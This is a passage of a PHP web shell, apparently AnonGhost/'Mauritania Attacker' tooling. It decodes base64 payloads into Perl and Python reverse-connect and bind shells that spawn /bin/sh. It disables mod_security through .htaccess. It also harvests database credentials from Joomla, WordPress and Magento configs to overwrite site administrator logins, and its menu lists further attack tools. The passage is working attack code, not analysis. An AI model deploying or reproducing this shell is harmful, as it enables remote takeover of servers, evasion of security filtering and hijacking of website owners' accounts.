4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMnB0Ij5Vc2FnZTogcmV2ZXJzZXNoLnB5IFtpcG11XSBbUG9ydG11XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCI+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHB5dGhvbiBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcHl0aG9uIHJldmVyc2UucHkgeW91cklQIFBvcnQ8L3N0cm9uZz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0idnciIHNpemU9IjUwIiB2YWx1ZT0iY21kIj4gPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIHNpemU9IjQzIj4gPHNlbGVjdCBuYW1lPWV4ZWNtZXRob2Q+DQo8b3B0aW9uIHZhbHVlPSJzeXN0ZW0iPlN5c3RlbTwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0iZXhlYyI+RXhlYzwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPlBhc3N0aHJ1PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT0icG9wZW4iPnBvcGVuPC9vcHRpb24+DQo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9wPjwvZm9ybT4nOw0KPz4=';
1862. $file = fopen("kiter.php" ,"w+");
1863. $write = fwrite ($file ,base64_decode($merdeeeee));
1864. fclose($file);
1865. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Python Connect Shell Priv8</span><center><center><br><iframe src=pyrevrshell/kiter.php width=75% height=70% frameborder=0></iframe></div></center>';
1866. }
1867. elseif($_GET['do'] == 'pbc') {
1868. echo "<center>";
1869. echo "<ul>";
1870. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1871. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1872. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1873. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1874. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1875. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1876. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1877. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1878. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1879. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1880. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1881. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1882. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1883. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1884. echo "</ul>";
1885. echo "</center>";
1886. mkdir('Backperlrev', 0755);
1887. chdir('Backperlrev');
1888. $kokwkwkwkwkw = ".htaccess";
1889. $wkwkwkwkw_adi = "$kokwkwkwkwkw";
1890. $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw a&#231;&#305;lamad&#305;!");
1891. $zilzil = "<IfModule mod_security.c>
1892. SecFilterEngine Off
1893. SecFilterScanPOST Off
1894. </IfModule>";
1895. fwrite ( $wkwkwkwkw , $zilzil ) ;
1896. fclose ($wkwkwkwkw);
1897. $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw==';
1898.  
1899. $zerer = fopen("reverse.pl" ,"w+");
1900. $write = fwrite ($zerer ,base64_decode($shellololol));
1901. fclose($zerer);
1902. chmod("reverse.pl",0755);
1903.  
1904. //extract php command shell
1905. $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudCAhaW1wb3J0YW50OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDt9ICAgICAgYXt0ZXh0LWRlY29yYXRpb246bm9uZTsgZm9udC1mYW1pbHk6IFRhaG9tYSwgR2VuZXZhOyBjb2xvcjojMDA3NzAwOyBwYWRkaW5nOjJweCAycHg7fSAgICAgIGE6aG92ZXJ7Y29sb3I6IzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwZmYwMCAwcHggMHB4IDNweDt9CSAgLmFyZWEgeyBjb2xvcjogIzAwYmIwMDsgZm9udC1zaXplOiA5cHQ7IHRleHQtc2hhZG93OiMwMDAwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogc29saWQgMHB4ICMwMDc3MDA7IGJhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDk5MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7IH0JICBpbnB1dFt0eXBlPXN1Ym1pdF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDc3MDsgIGZvbnQtd2VpZ2h0OiBib2xkOyB0ZXh0LWFsaWduOiBjZW50ZXI7ICB0ZXh0LXNoYWRvdzogMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOyAgYmFja2dyb3VuZDogI2FlYWVhZTsgIGJhY2tncm91bmQtY2xpcDogcGFkZGluZy1ib3g7ICBib3JkZXI6IDFweCBzb2xpZCAjMjg0NDczOyAgYm9yZGVyLWJvdHRvbS1jb2xvcjogIzIyM2I2NjsgIGJvcmRlci1yYWRpdXM6IDRweDsgIGN1cnNvcjogcG9pbnRlcjsgIGJhY2tncm91bmQtaW1hZ2U6LXdlYmtpdC1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1tb3otbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtby1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IGxpbmVhci1ncmFkaWVudCh0byBib3R0b20sICNlYWVhZWEsICNkMGQwZDApOyAgLXdlYmtpdC1ib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgIGJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyB9IGlucHV0W3R5cGU9dGV4dF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiAjNzc3Nzc3IDBweCAwcHggM3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwNzcwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4O30gaW5wdXRbdHlwZT1zdWJtaXRdOmhvdmVyLCBpbnB1dFt0eXBlPXRleHRdOmhvdmVyeyBjb2xvcjogI2ZmZmZmZjsgdGV4dC1zaGFkb3c6ICMwMDY2MDAgMHB4IDBweCA0cHg7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9IHNlbGVjdHsgcGFkZGluZzogM3B4OyB3aWR0aDogMTYycHg7IGNvbG9yOiAjMDBhYTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBhYTAwOyAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDt9IHNlbGVjdDpob3ZlcnsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSAgICNjb21tYW5kc3sgbWFyZ2luLWxlZnQ6IDM1MHB4OyBtYXJnaW4tcmlnaHQ6IDM1MHB4OyB9IG9wdGlvbnsgY29sb3I6ICM3Nzc3Nzc7IH08L3N0eWxlPg0KPD9waHANCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDc3MDAiIGZhY2U9IlRhaG9tYSIgc3R5bGU9ImZvbnQtc2l6ZTogMTFwdCI+VXNhZ2U6IHBlcmwgcmV2ZXJzZS5wbCBbaXBtdV0gW1BvcnRtdV08L2ZvbnQ+PGJyPic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiANCjxpbWcgYm9yZGVyPSIwIiA+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcGVybCBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcGVybCByZXZlcnNlLnBsIHlvdXJJUCBQb3J0PC9zdHJvbmc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+';
1906. $file = fopen("kit.php" ,"w+");
1907. $write = fwrite ($file ,base64_decode($zonop));
1908. fclose($file);
1909.  
1910. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Perl Connect Shell Priv8</span></b><center><br><iframe src=Backperlrev/kit.php width=75% height=60% frameborder=0></iframe></div></center>";
1911.  
1912. }
1913. elseif($_GET['do'] == 'bc') {
1914. echo "<center>";
1915. echo "<ul>";
1916. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1917. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1918. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1919. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1920. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1921. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1922. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1923. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1924. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1925. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1926. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1927. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1928. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1929. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1930. echo "</ul>";
1931. echo "</center>";
1932. echo "<form method='post'>
1933. <u>Bind Port:</u> <br>
1934. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1935. <input type='submit' name='sub_bp' value='>>'>
1936. </form>
1937. <form method='post'>
1938. <u>Back Connect:</u> <br>
1939. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1940. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1941. <input type='submit' name='sub_bc' value='>>'>
1942. </form>";
1943. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1944. if(isset($_POST['sub_bp'])) {
1945. $f_bp = fopen("/tmp/bp.pl", "w");
1946. fwrite($f_bp, base64_decode($bind_port_p));
1947. fclose($f_bp);
1948.  
1949. $port = $_POST['port_bind'];
1950. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1951. sleep(1);
1952. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1953. unlink("/tmp/bp.pl");
1954. }
1955. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1956. if(isset($_POST['sub_bc'])) {
1957. $f_bc = fopen("/tmp/bc.pl", "w");
1958. fwrite($f_bc, base64_decode($bind_connect_p));
1959. fclose($f_bc);
1960.  
1961. $ipbc = $_POST['ip_bc'];
1962. $port = $_POST['port_bc'];
1963. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1964. sleep(1);
1965. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1966. unlink("/tmp/bc.pl");
1967. }
1968. }
1969. elseif($_GET['do'] == 'aeu') {
1970. if($_POST['hajar']) {
1971. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1972. echo "username atau password harus lebih dari 6 karakter";
1973. } else {
1974. $user_baru = $_POST['user_baru'];
1975. $pass_baru = md5($_POST['pass_baru']);
1976. $conf = $_POST['config_dir'];
1977. $scan_conf = scandir($conf);
1978. foreach($scan_conf as $file_conf) {
1979. if(!is_file("$conf/$file_conf")) continue;
1980. $config = file_get_contents("$conf/$file_conf");
1981. if(preg_match("/JConfig|joomla/",$config)) {
1982. $dbhost = ambilkata($config,"host = '","'");
1983. $dbuser = ambilkata($config,"user = '","'");
1984. $dbpass = ambilkata($config,"password = '","'");
1985. $dbname = ambilkata($config,"db = '","'");
1986. $dbprefix = ambilkata($config,"dbprefix = '","'");
1987. $prefix = $dbprefix."users";
1988. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1989. $db = mysql_select_db($dbname);
1990. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1991. $result = mysql_fetch_array($q);
1992. $id = $result['id'];
1993. $site = ambilkata($config,"sitename = '","'");
1994. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1995. echo "Config => ".$file_conf."<br>";
1996. echo "CMS => Joomla<br>";
1997. if($site == '') {
1998. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1999. } else {
2000. echo "Sitename => $site<br>";
2001. }
2002. if(!$update OR !$conn OR !$db) {
2003. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2004. } else {
2005. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2006. }
2007. mysql_close($conn);
2008. } elseif(preg_match("/WordPress/",$config)) {
2009. $dbhost = ambilkata($config,"DB_HOST', '","'");
2010. $dbuser = ambilkata($config,"DB_USER', '","'");
2011. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2012. $dbname = ambilkata($config,"DB_NAME', '","'");
2013. $dbprefix = ambilkata($config,"table_prefix = '","'");
2014. $prefix = $dbprefix."users";
2015. $option = $dbprefix."options";
2016. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2017. $db = mysql_select_db($dbname);
2018. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2019. $result = mysql_fetch_array($q);
2020. $id = $result[ID];
2021. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2022. $result2 = mysql_fetch_array($q2);
2023. $target = $result2[option_value];
2024. if($target == '') {
2025. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2026. } else {
2027. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2028. }
2029. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2030. echo "Config => ".$file_conf."<br>";
2031. echo "CMS => Wordpress<br>";
2032. echo $url_target;
2033. if(!$update OR !$conn OR !$db) {
2034. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2035. } else {
2036. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2037. }
2038. mysql_close($conn);
2039. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
2040. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
2041. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
2042. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
2043. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
